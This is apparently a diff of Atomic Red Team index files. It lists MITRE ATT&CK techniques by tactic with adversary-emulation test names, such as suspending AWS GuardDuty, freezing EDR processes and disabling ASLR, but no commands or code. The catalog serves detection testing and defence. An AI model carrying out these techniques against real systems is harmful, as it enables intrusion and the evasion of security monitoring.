discovery,T1083,File and Directory Discovery,7,ESXi - Enumerate VMDKs available on an ESXi Host,4a233a40-caf7-4cf1-890a-c6331bbc72cf,command_prompt
|
||||
discovery,T1083,File and Directory Discovery,9,Recursive Enumerate Files And Directories By Powershell,95a21323-770d-434c-80cd-6f6fbf7af432,powershell
|
||||
discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
|
||||
discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
|
||||
discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
|
||||
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery via PowerShell (Process Mapping),b52c8233-8f71-4bd7-9928-49fec8215cf5,powershell
|
||||
discovery,T1049,System Network Connections Discovery,7,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
|
||||
discovery,T1654,Log Enumeration,1,Get-EventLog To Enumerate Windows Security Log,a9030b20-dd4b-4405-875e-3462c6078fdc,powershell
|
||||
discovery,T1654,Log Enumeration,2,Enumerate Windows Security Log via WevtUtil,fef0ace1-3550-4bf1-a075-9fea55a778dd,command_prompt
|
||||
discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
|
||||
|
||||
|
@@ -97,12 +97,15 @@
|
||||
- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1134.004 Access Token Manipulation: Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1679 Selective Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1678 Delay Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1218.001 Signed Binary Proxy Execution: Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1070.005 Indicator Removal on Host: Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1562.001 Impair Defenses: Disable or Modify Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1036.012 Browser Fingerprint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1055.012 Process Injection: Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -225,6 +228,7 @@
|
||||
- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -236,7 +240,8 @@
|
||||
- T1055.015 Process Injection: ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1547.008 Boot or Logon Autostart Execution: LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
|
||||
- Atomic Test #3: At - Schedule a job via kubectl in a Pod [containers]
|
||||
- T1055.001 Process Injection: Dynamic-link Library Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.007 Event Triggered Execution: Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -255,6 +260,7 @@
|
||||
- T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1674 Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1204.005 Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1059.001 Command and Scripting Interpreter: PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -268,7 +274,8 @@
|
||||
- T1204.004 Malicious Copy and Paste [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1569.002 System Services: Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
|
||||
- Atomic Test #3: At - Schedule a job via kubectl in a Pod [containers]
|
||||
|
||||
# persistence
|
||||
- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -308,7 +315,8 @@
|
||||
- T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1136.001 Create Account: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
|
||||
- Atomic Test #10: Create a Linux user via kubectl in a Pod [containers]
|
||||
- T1176.002 IDE Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.012 Event Triggered Execution: Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -340,6 +348,7 @@
|
||||
- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -355,7 +364,8 @@
|
||||
- T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1137.002 Office Application Startup: Office Test [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1547.008 Boot or Logon Autostart Execution: LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
|
||||
- Atomic Test #3: At - Schedule a job via kubectl in a Pod [containers]
|
||||
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.007 Event Triggered Execution: Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -401,7 +411,8 @@
|
||||
- T1219.002 Remote Desktop Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1071.001 Application Layer Protocol: Web Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1105 Ingress Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
|
||||
- Atomic Test #39: Curl Insecure Connection from a Pod [containers]
|
||||
- T1665 Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1001.002 Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -421,6 +432,7 @@
|
||||
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1074.001 Data Staged: Local Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1114.001 Email Collection: Local Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1213.006 Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1115 Clipboard Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -490,6 +502,7 @@
|
||||
- T1003.005 OS Credential Dumping: Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1552.003 Unsecured Credentials: Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1552.001 Unsecured Credentials: Credentials In Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1552.006 Unsecured Credentials: Group Policy Preferences [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -531,6 +544,7 @@
|
||||
- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1082 System Information Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1016.002 System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1518.002 Backup Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -557,6 +571,7 @@
|
||||
- Atomic Test #9: Network Service Discovery for Containers [containers]
|
||||
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1680 Local Storage Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1124 System Time Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
# impact
|
||||
@@ -606,7 +621,8 @@
|
||||
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1566.004 Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1195.002 Compromise Software Supply Chain](../../T1195.002/T1195.002.md)
|
||||
- Atomic Test #1: Simulate npm package installation on a Linux system [containers, linux]
|
||||
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
@@ -84,6 +84,7 @@
|
||||
- T1057 Process Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1018 Remote System Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1680 Local Storage Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1124 System Time Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
# collection
|
||||
|
||||
@@ -97,13 +97,16 @@
|
||||
- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1134.004 Access Token Manipulation: Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1679 Selective Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1678 Delay Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1218.001 Signed Binary Proxy Execution: Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1070.005 Indicator Removal on Host: Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
|
||||
- Atomic Test #46: AWS - GuardDuty Suspension or Deletion [iaas:aws]
|
||||
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1036.012 Browser Fingerprint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1055.012 Process Injection: Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -227,6 +230,7 @@
|
||||
- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -257,6 +261,7 @@
|
||||
- T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1674 Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1204.005 Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1059.001 Command and Scripting Interpreter: PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -346,6 +351,7 @@
|
||||
- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -427,6 +433,7 @@
|
||||
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1074.001 Data Staged: Local Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1114.001 Email Collection: Local Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1213.006 Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1115 Clipboard Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -498,6 +505,7 @@
|
||||
- T1003.005 OS Credential Dumping: Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1552.003 Unsecured Credentials: Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1552.001 Unsecured Credentials: Credentials In Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1552.006 Unsecured Credentials: Group Policy Preferences [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -539,6 +547,7 @@
|
||||
- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1082 System Information Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1016.002 System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1518.002 Backup Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -564,6 +573,7 @@
|
||||
- T1046 Network Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1680 Local Storage Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1124 System Time Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
# impact
|
||||
|
||||
@@ -229,6 +229,7 @@
|
||||
- Atomic Test #8: Hex decoding with shell utilities [linux, macos]
|
||||
- Atomic Test #9: Linux Base64 Encoded Shebang in CLI [linux, macos]
|
||||
- Atomic Test #10: XOR decoding and command execution using Python [linux, macos]
|
||||
- Atomic Test #11: Expand CAB with expand.exe [windows]
|
||||
- [T1562 Impair Defenses](../../T1562/T1562.md)
|
||||
- Atomic Test #1: Windows Disable LSA Protection [windows]
|
||||
- Atomic Test #2: Disable journal logging via systemctl utility [linux]
|
||||
@@ -594,7 +595,10 @@
|
||||
- Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
|
||||
- Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
|
||||
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1679 Selective Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1562.013 Disable or Modify Network Device Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1678 Delay Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1218.001 Signed Binary Proxy Execution: Compiled HTML File](../../T1218.001/T1218.001.md)
|
||||
@@ -670,8 +674,11 @@
|
||||
- Atomic Test #55: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell [windows]
|
||||
- Atomic Test #56: Disable EventLog-Application ETW Provider Via Registry - Cmd [windows]
|
||||
- Atomic Test #57: Disable EventLog-Application ETW Provider Via Registry - PowerShell [windows]
|
||||
- Atomic Test #58: Freeze PPL-protected process with EDR-Freeze [windows]
|
||||
- Atomic Test #59: Disable ASLR Via sysctl parameters - Linux [linux]
|
||||
- T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1036.012 Browser Fingerprint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1055.012 Process Injection: Process Hollowing](../../T1055.012/T1055.012.md)
|
||||
@@ -1086,6 +1093,7 @@
|
||||
